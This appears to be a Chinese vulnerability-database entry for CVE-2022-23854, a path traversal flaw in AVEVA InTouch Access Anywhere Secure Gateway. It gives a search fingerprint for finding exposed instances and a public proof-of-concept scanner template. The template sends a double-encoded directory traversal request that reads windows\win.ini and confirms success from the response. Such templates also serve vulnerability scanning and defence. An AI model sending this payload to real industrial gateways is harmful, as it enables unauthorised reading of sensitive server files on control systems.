漏洞描述
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息
body="InTouch Access Anywhere"
CVE-2022-23854: AVEVA InTouch 安全网关 AccessAnywhere 任意文件读取漏洞
PoC代码[已公开]
id: CVE-2022-23854
info:
name: AVEVA InTouch 安全网关 AccessAnywhere 任意文件读取漏洞
author: zan8in
severity: high
description: |
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞,未授权的攻击者可利用该漏洞获取服务器敏感信息
body="InTouch Access Anywhere"
reference:
- http://wiki.peiqi.tech/wiki/webapp/AVEVA/AVEVA%20InTouch%E5%AE%89%E5%85%A8%E7%BD%91%E5%85%B3%20AccessAnywhere%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2022-23854.html
rules:
r0:
request:
method: GET
path: /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
expression: response.status == 200 && response.raw_header.bcontains(b'EricomSecureGateway') && response.body.bcontains(b'for 16-bit app support') && response.body.bcontains(b'extensions')
expression: r0()